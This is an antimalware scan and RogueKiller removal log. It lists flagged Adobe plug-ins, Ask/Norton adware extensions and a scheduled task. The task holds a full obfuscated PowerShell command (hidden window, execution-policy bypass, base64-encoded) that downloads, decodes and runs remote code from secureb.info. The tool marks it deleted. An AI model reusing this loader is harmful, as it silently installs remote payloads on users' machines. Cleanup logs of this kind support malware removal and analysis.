SHA-1: 2774ad744d4c864eb0bb25568265f82d7b49e9f6
Created: 09/11/2015 15:43:24
Detections: 1
Determination: Inconclusive
- Avira AntiVirus as TR/Spy.Viking.Gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe media encoder cc 2015\mc_demux_mp2.dll
Publisher: MainConcept GmbH
MD5: 792899d0f7c4c7bede953718201f64fe
SHA-1: 0dda9154143ca841ac22985a0498e895e4a297f6
Created: 25/05/2015 21:19:16
Detections: 1
Determination: Ignore detections (false positive)
- Avira AntiVirus as TR/Crypt.XPACK.Gen

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe media encoder cc 2015\plug-ins\de_de\vstplugins\decrackler1.dll
Publisher: CubeTec International
MD5: 70059d9a9062e9e1638a5860c33177ef
SHA-1: b0c2cef527736b4758f93cbef4a3dbdc78ddde50
Created: 26/05/2015 01:37:06
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as DeepScan:Generic.Lineage.BEDD0A3E (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe media encoder cc 2015\plug-ins\es_es\vstplugins\declicker1.dll
Publisher: CubeTec International
MD5: 76c4dd9494fdb6a4b1a624863c7ceadd
SHA-1: 01179dc0899c7f37a73b69bc60c3ea9ede506953
Created: 26/05/2015 01:37:06
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Gen:Variant.Kazy.5640 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe media encoder cc 2015\plug-ins\es_es\vstplugins\dehummer6.dll
Publisher: CubeTec International
MD5: 6054ae8ea04409bdf1ce2562ddc338f8
SHA-1: 41383e4395cf9cee954133a11fa8fb9288ef7f8b
Created: 26/05/2015 01:37:06
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Trojan.AutorunINF.Gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe media encoder cc 2015\plug-ins\fr_fr\vstplugins\denoiser2.dll
Publisher: CubeTec International
MD5: b60dcc2a1aa12310000791aaeb96cb04
SHA-1: 2db3003ede2977d56b1887c8facf99c2cd8e2e14
Created: 26/05/2015 01:37:06
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Gen:Variant.Zusy.5167 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe media encoder cc 2015\plug-ins\ja_jp\vstplugins\declicker1.dll
Publisher: CubeTec International
MD5: 7c9266dfe33b7c08c769ea7edc55ef9d
SHA-1: b63a06518dca7306b66d280ac9831c3a9570e7b0
Created: 26/05/2015 01:37:06
Detections: 1
Determination: Ignore detections (false positive)
- ViRobot as Scan Failed... (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe media encoder cc 2015\plug-ins\ko_kr\vstplugins\chorus6.dll
Publisher: CubeTec International
MD5: 6d207ab52185bb41373f8b8830aae993
SHA-1: a3b645cbc7e6d927b162afa98d39bd54bdf5c78b
Created: 26/05/2015 01:37:06
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Gen:Variant.Barys.24444 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe premiere pro cc 2015\mc_demux_mp2.dll
Publisher: MainConcept GmbH
MD5: 792899d0f7c4c7bede953718201f64fe
SHA-1: 0dda9154143ca841ac22985a0498e895e4a297f6
Created: 03/06/2015 23:02:52
Detections: 1
Determination: Ignore detections (false positive)
- Avira AntiVirus as TR/Crypt.XPACK.Gen

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe premiere pro cc 2015\plug-ins\de_de\vstplugins\decrackler1.dll
Publisher: CubeTec International
MD5: 70059d9a9062e9e1638a5860c33177ef
SHA-1: b0c2cef527736b4758f93cbef4a3dbdc78ddde50
Created: 03/06/2015 23:00:38
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as DeepScan:Generic.Lineage.BEDD0A3E (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe premiere pro cc 2015\plug-ins\es_es\vstplugins\declicker1.dll
Publisher: CubeTec International
MD5: 76c4dd9494fdb6a4b1a624863c7ceadd
SHA-1: 01179dc0899c7f37a73b69bc60c3ea9ede506953
Created: 03/06/2015 23:00:40
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Gen:Variant.Kazy.5640 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe premiere pro cc 2015\plug-ins\es_es\vstplugins\dehummer6.dll
Publisher: CubeTec International
MD5: 6054ae8ea04409bdf1ce2562ddc338f8
SHA-1: 41383e4395cf9cee954133a11fa8fb9288ef7f8b
Created: 03/06/2015 23:00:40
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Trojan.AutorunINF.Gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe premiere pro cc 2015\plug-ins\fr_fr\vstplugins\denoiser2.dll
Publisher: CubeTec International
MD5: b60dcc2a1aa12310000791aaeb96cb04
SHA-1: 2db3003ede2977d56b1887c8facf99c2cd8e2e14
Created: 03/06/2015 23:00:42
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Gen:Variant.Zusy.5167 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe premiere pro cc 2015\plug-ins\ja_jp\vstplugins\declicker1.dll
Publisher: CubeTec International
MD5: 7c9266dfe33b7c08c769ea7edc55ef9d
SHA-1: b63a06518dca7306b66d280ac9831c3a9570e7b0
Created: 03/06/2015 23:00:42
Detections: 1
Determination: Ignore detections (false positive)
- ViRobot as Scan Failed... (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\adobe\adobe premiere pro cc 2015\plug-ins\ko_kr\vstplugins\chorus6.dll
Publisher: CubeTec International
MD5: 6d207ab52185bb41373f8b8830aae993
SHA-1: a3b645cbc7e6d927b162afa98d39bd54bdf5c78b
Created: 03/06/2015 23:00:44
Detections: 1
Determination: Ignore detections (false positive)
- Emsisoft Anti-Malware as Gen:Variant.Barys.24444 (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\nathan\appdata\local\google\chrome\user data\default\extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe\2016.0.2.3_0\background.js
Publisher:
MD5: 27f1a60e14a6fc696483e3369626b97f
SHA-1: f26f217705430a8572a2c0e362766b3a816c1ec0
Created: 02/12/2016 15:41:23
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Norton.Ask.Search (L) (Adware)

---------------------------------------------------------------------------------

File path: c:\users\nathan\appdata\local\google\chrome\user data\default\extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe\2016.0.2.3_0\docstart.js
Publisher:
MD5: fa60039d42e65055cff751d4e73877e8
SHA-1: a7b95980f2d0f61c0e907feba35582ae358c19a8
Created: 02/12/2016 15:41:23
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Norton.Ask.Search (L) (Adware)

---------------------------------------------------------------------------------

File path: c:\users\nathan\appdata\local\google\chrome\user data\default\extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe\2016.0.2.3_0\safeweb\scripts\google.js
Publisher:
MD5: bdf2952792aec397d01fe36306949224
SHA-1: 07075d30e635dde2ff7531dda6ebbc894774c8b6
Created: 02/12/2016 15:41:23
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Norton.Ask.Search (L) (Adware)

---------------------------------------------------------------------------------

File path: c:\users\nathan\appdata\local\google\chrome\user data\default\extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe\2016.0.2.3_0\safeweb\scripts\shasta.js
Publisher:
MD5: db707b7f4f63992f8684d1359e367427
SHA-1: 275f2967712cd3cf4e4405fd824f8704a540a684
Created: 02/12/2016 15:41:23
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Norton.Ask.Search (L) (Adware)

---------------------------------------------------------------------------------

File path: c:\users\nathan\appdata\local\chromium\user data\default\extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe\2015.7.1.12_0\docstart.js
Publisher:
MD5: 90fd603f5f382784962e2e27d772d958
SHA-1: b65d3f08026f88f64a269b377a5d1275fd83770c
Created: 20/09/2016 21:03:35
Detections: 1
Determination: Adware
- Reason Heuristics as PUP.Norton.Ask.Search (L) (Adware)

RogueKiller V12.8.5.0 (x64) [Dec 12 2016] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.14393) 64 bits version
Started in : Normal mode
User : Nathan [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 12/12/2016 14:31:34 (Duration : 00:17:57)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 9 ¤¤¤
[PUP] (X64) HKEY_CLASSES_ROOT\CLSID\{D4027C7F-154A-4066-A1AD-4243D8127440} ("C:\Program Files (x86)\AskPartnerNetwork\Toolbar\VDJ\Passport_x64.dll") -> Not selected
[PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D4027C7F-154A-4066-A1AD-4243D8127440} ("C:\Program Files (x86)\AskPartnerNetwork\Toolbar\VDJ\Passport_x64.dll") -> Not selected
[PUP] (X64) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar | {D4027C7F-154A-4066-A1AD-4243D8127440} : 0 ("C:\Program Files (x86)\AskPartnerNetwork\Toolbar\VDJ\Passport_x64.dll") -> Not selected
[PUM.HomePage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=N360&pvid=22.5.5.15 -> Not selected
[PUM.HomePage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=N360&pvid=22.5.5.15 -> Not selected
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=N360&pvid=22.5.5.15 -> Not selected
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=N360&pvid=22.5.5.15 -> Not selected
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {EC17003C-48C5-4644-AF23-AD46FC87C9C3} : v2.24|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Users\Nathan\AppData\Local\Chromium\Application\chrome.exe|Name=Chromium (mDNS-In)|Desc=Inbound rule for Chromium to allow mDNS traffic.|EmbedCtxt=Chromium| [x] -> Not selected
[PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {7E4D7D6D-DF37-44C2-B55F-7762502580A8} : v2.24|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Users\Nathan\AppData\Local\BrowserAir\Application\BrowserAir.exe|Name=BrowserAir (mDNS-In)|Desc=Inbound rule for BrowserAir to allow mDNS traffic.|EmbedCtxt=BrowserAir| [x] -> Not selected

¤¤¤ Tasks : 2 ¤¤¤
[PUP] \DNSKALAMAZOO -- C:\Program Files (x86)\DNS Unlocker\dnskalamazoo.exe (/Scheduled) -> Not selected
[Adw.SystemHealer] \{790A0E47-0508-097E-0F11-0F7A7E0A1104} -- C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAZQBjAHUAcgBlAGIALgBpAG4AZgBvAC8AdQAvAD8AYQA9AHIATwBGAFYAWgBYAG0AWQBXAHYAaQBNAGsAOABRADUAcABzAF8AdwBOAFIAVgA4ADAAOAB2AFoAZQBOAFEAYQBKAFgAVgBuAHYAagBYAHUAUQBxAGUAUABfADUAUABjAFoATwAxAEQAMABWAGkANAB4AHAAMgBmAHUAVQBTAHkASwBqAEQATgBLAEoAXwAyAFgATwAwAFkAcwBLAEYAbABPAEEAMQA3AEoASgBHAGcAQgBDADUAcABOADkAWgBRAGQAMQBFAGQAMgAxAHcAQwA3AEcASwBwAG0AXwBRAGoAQwBDAHcANQA0AEoAZgB2AEQATAA1AGsAagBhADMAVABkAFkAMgBtAHgANwBiADkASwB4AGoAeABzAEIAYQBtAHAATAA1AHMAQQA4ADUAaQBoADAAdQBpAF8AYgBKADgAWgBaADQANQBRAFUAcQBhAC0AXwByAFQANgAzADEANgBOAFcAegBmADEATwA0AFYAaQBOAGYANgBWAFYAbgBNAFgAVgBOADIAbABVAHQAaABwAGMAQQB2AEkAQQBiAFoAcABMAHMAcgBSAGUANgBTAGQAQQB6AGoAdQBSAFIAWgBlAHEAWgBMADAAdQBmAG4AZABXAGIASgB3AF8ARgByAEYAYgByAGIALQBpAC0AOABhAGoAOQBaADkAUwBwAF8AQQBuAFIAawA3AGQAXwAwAEwAaABNAEoAeQB4AEYARQBTAGEATQBtAHIAQgBUAGwAUQBiAE4AQgBBAFUASwBVAFIAZwBTAE8AeQBfADUASwBZAHoATwAxAEgAQQBwAHQAYwBYAHgAMABGADMASQA1AGgAeABiAFAALQBDAHkAQQBkAFMAQQA2AHkARgBMAGIAdwBOADEAeABEAGgAZwBvAGEATAAtADgAXwBTADgAWQB1AHIAMgBkAHIAbABWAG4AZwB5ADYAUABSAGQAZgBwAEsAdABOAFkASABHAF8AMQBwAHcATwBSAFEANABWAHAAVwBRAGcAZwBEAEsAYQBlAFAAdgBLAHoAegBJAC0AWABvAG4AcwBJAEQAbQA0AFAAWgBzAGYASABaAFQATABkAHEAYwBPAF8AVwBsAEgARwBzAGUARQA5ADIAZQB1AGgAVgAwAGkANABJAFQAeQBtADAATQBYAF8AbgA1AGIAcwBTAEkAZwBfAFAAbAA5AHQAVwB1AGIAdwBwAGkATgB0AHAATAAtADUAVgA1ADEAMwBtAEUAdwA0AEoATQBsAEsAegBSAFkANgBYAHEARgBHAFIASQA1AHkAVwA3AHkAQwBVAGMARwBLADgAdwBRADQAdwA5AEUAWQBnAE8ANgBaAFEAZAB4AE4AWgBQAFkANABhAHQAYQBmAHcAZABCAEcAYgB5AE0AQQBxADAAegBRAFUALQBKAEIASQBNAFgAQwBoAE4AZABMAEEAcwBnAGMAVABhAFIAUQBZADYAbgBZADgANgAxAEgAaQBrAFMAUABqAC0AUgBBAHMAdwB1AG4AbABxAHAAcwBtAEYAVwBoAHEAdwBYAGsAcgBxAGIAYgBaAFUANgBsAGQAVABwAFQATABNAFEAeAAtAHMAdwA1AEYANgBnAFMAXwBkAE0AVABWAFcAXwBLAEsAeQBhAEIATABxAEgAOQBTAHcAeQAyAGEAdABTAEsAZwAxADMATABtAEsAQQBtAGIASQBWAGcAVwBUAFIAeABiADEAdQBTAEEAMwBxAGIATwA4AFUAMABhAEsANAByAC0AUgA0AC0AZwBFAFMAMgBzAG8AQgBRAHcAdQB2AGoANABtAGMAUABlAFcAcABHAHkAMABoAGMASABaAGEARgA1AHEAZABfAEcAVgBpAHkAdgAxAHcAagA3ADIASgBDADMANAA0AE8ARQBKAG0AVgA2ADMATwB5AHkAeQBMAHEAbgB3AGQAdwBqAG4AcwBRAFQAcgBxAFcAOQB3AGQANwBQAFgAZAB3AEgAOQBTAEwATQBFADYAbQBxAC0AbQAwADcALQAyAFEAYQB2AGIAYwBfAEEAawBNAEcAegBGADkAaAA2AEMAcABGAEwAMABzAHAAdgBfAHoAbABDAFYAdwBoAG0AdwBhAEgARgA0ADMASQBhAEsASgBRAHQAQwBZAEEAbABxAFEAVwBFADIASgAtAHEAcABZAHAASQA0AEMANQAyAEUAQwA0AEUAcABzAHMAZwBCAEUANQBEADQAdQBDADkARwB1ADcALQBhAGkAawAyAGoAYQAwAFcAQwB2ADAATwBXAGUAbgBHAGQAMABFADYAbwBfADMAMQBwAGsAdgB3ADMAawBnAGIATgAzAGgASgBvAHUAZwB4ADkAQQBZAEEAagBnAG0AZgBiACYAYwA9ADcAQwA0AHAASAB3AHIAdwBaAHkAVwA4AGYAaQBCAGkAcgB4ADIAawBwAFkAVwBLAFcAdABpAEEAOABjAFUATgBkADUAOABwAEIATwAyAGIAcAB4AHgAdABUAHoAQgA1AEcAMAAwAHkANABwAG8AWABlADUAMgA1AGwASABiAG0AUAB0AEYALQBSAGMAWQBFAGsARgBTAHQAbwBtAHkAcwBsAFQANwBQAHUAQQBIAGgAYgBEAFYAawB6ADMAeQBEAF8ANAB3AFcANwB5AC0AcwB2AGoAWQBFAGUAWABnADYAQwBaAEoALQBqADcAYQAzADcAQQBqAF8AaAAwAFYAcwBxAFIANgAzADMAbABJAHcAbABsAFkAWgBMAGEAdABHAFkAeABEAFEARQBUAE0AQQBjAHgAXwBKAHYATAB2ADMAeABQADMAZQBwAEcANwBBADIAagBXAFUAaAB3AGgAbAA4AGUAVwB6AHoAaQBGAGMARQBLAHMAbgBGAGwANAA1AGYAQgBYAFIAUQB1AGUAYwB6AGwAWABvAHEAQwB1ADYANABGAF8ATwBNAE0AUgBEAHQAdgBPADkAdgBZAHUARQBXAEoATwB2ADgANgBkAE4AdwB1ADgAaAA2ADIAUgBCAF8AcwBaADQATwBkAGwAZAB1AGgATAA4AEkANwBnAEgAMwByADYAeABNAC0ARgBBAEUAaQBZAEcAQQBTAGQAcgAwAHEAagBDAFQAYwBMAGUAVgBkAHYAdQBCAFcAeABkAFQAUAA4AEQAOQBkAGEATABrAFMANgA1AHMAMQAwAGMAbQBpAFcAYwBhAFEAWAByAEcAeAB3AEEAVABCAHYASwBzAE4AagBjADcAZwBUAE8ARAB1AC0ARgB2AGMASwBZAHQAWgA0AEQAMQBHAFgAbQBMAGkAbgBwADIAdwB6AEkASQBTAFMAVgBCAG4AbgA5ADcAOQBRAHMAWgBGAFYATQBVAHIATgBjAHYANwBEADUAMwBhAGwANgBmAHgAcgBsAFYANwBnAEYAWgA4ADEAYQBNAGcANgB4ADMAOAB1ADYASgBmAHoAQgBvADMAYwBKADAAbwBLAEEAYwBsADcAaABfADYAYgB4AFMATAB6AGYASgBmADQARwBaAFkAUwBGAFAAYwBZAGEAUgBVADYATQBUAGYAZABIADQAYwBGADIASQAyAFUAcwBCAEUATwBrAFgATQBaAEsAaQBnAEYANwB1AFIAOQBYAFcATABzAE0AUgAzAGYAZQAyADAATABYAEMAbgBNAEUAUwAtAHoAMQBUAG8AdgBDAEsASwBwADcAcQBqAGkAOQA0AGsAZQBDAHgAMgBfAEgANQBxAEMAOABqADAAVgBZAFEAWABjAGoAQwBmAEsAdAAzAGQANQBZAG8AVQBSAE4ARQA1AFMAWgBRAFkAVgBwAG4AbQA2AGwAcgBzAGQATABrADgAXwB5AFUAMABJAHcAWgBVAFEAVwBOAEgAagBsAFAANwBaAGwAVQBVADAAagBnADIAcAB3AE0ARwAtAHMANQBXADYAaABsADEANABQAEMAWABxAEYATgBQAG4AMABlAE8ARABjADAAYQBiAG4AYwAwAEwAdwBYAGEAdAA5AHQAZAB4AEsAZQByAGYAaQBOAGkAUwBKAEcARQBvAEUAagBPAC0AWQAtAFMAQwBHAGcAYQB5AC0AeQBCAEQAcgA0AG0AUgBqAGgAOABkAE0ASABNADcASAA0AHYAVABfAEwARQAxAGoAbQBjAHMAVwBWAFMAOABrAE8AMwBsADgATwBmAHMAWQBhAGIAagBEAHkAagByAGYAZwBOAG8ANQAyAEsAZAA0AEcAUgBVAGUAdABJADEAdwBtAHIARAA1AEsATgBMAFQAWABYAE8AUgBuAGsAXwBIAGcAegBIAHEARQBUAFIAVgAtAEcANQBCAGwAUABiAGoAVgBEADcAaABZAGMAUgBxADIAXwBlAHkAcQBmAEcAcAAtAG8AUABlADYAbAByAE0AVABqAFMANQBzAHcAaQByAEkAYgBhAEgAMwBJAFAANwA3AEsAeABSAEMATQA4AEYATwBOAGcAegA0AHAAZQA0AHQAUQBJAEQAaQBqAC0AZQBJAGsAZQAxAGUAegBiAGcANwBpAEUATwBRAHQAaABzAHYAWgBJAEoAeABvAFAAUwBNAEcATgBBAHQAOABwAEoAdQBMAG4AbwBVAEsAVwBQAEsAbQBlAFoAdQBTADUAcwA4AFgAUAB2AFUAcAB0ADkATAB5AGwAcQBEAFIALQBtAFMAcABMADMAVQBIADQAMABRADcAZABrADUATgBaAEEAdgBwADQAYwA2AEkAOAB0AHkASQBKADMAdAA1AGwAVQBRAFgAUwAwAEsATABJAFMAMABLAGkAVQB1AEoASwBXAEgAUwBVAGIALQA2ACYAcgA9ADMAMAA3ADgAMQA2ADMANwAzADIAMAAwADIAMgA2ADEAOQA2ACIAOwAkAHMAdABzAGsAPQAiAHsANwA5ADAAQQAwAEUANAA3AC0AMAA1ADAAOAAtADAAOQA3AEUALQAwAEYAMQAxAC0AMABGADcAQQA3AEUAMABBADEAMQAwADQAfQAiADsAJABwAHIAaQBkAD0AIgBTAHkAcwB0AGUAbQBIAGUAYQBsAGUAcgAiADsAJABpAG4AaQBkAD0AIgBJAFIASABOAEsASABRAE4AIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=) -> Deleted

¤¤¤ Files : 2 ¤¤¤
